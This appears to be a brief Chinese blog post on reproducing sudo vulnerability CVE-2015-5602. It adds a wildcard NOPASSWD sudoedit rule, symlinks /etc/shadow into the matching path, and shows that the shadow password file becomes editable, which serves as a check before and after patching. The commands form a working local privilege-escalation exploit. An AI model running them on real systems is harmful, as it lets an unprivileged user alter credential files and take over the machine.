1. 添加一个普通用户并设置用户密码
useradd wgh
passwd wgh
2. 在/etc/sudoers中添加下面一句话
wgh ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt
3. ssh 登录
ssh wgh@xx.xx.xx.xx
mkdir /home/wgh/newdir
ln -s /etc/shadow /home/wgh/newdir/test.txt
4. sudoedit /home/wgh/newdir/test.txt
发现可以修改/etc/shadow文件, 则证明存在cve-2015-5602漏洞是存在的。
打上补丁后,如果发现/etc/shadow不可以修改了,则证明漏斗已经被修复。
阅读(1273) | 评论(0) | 转发(0) |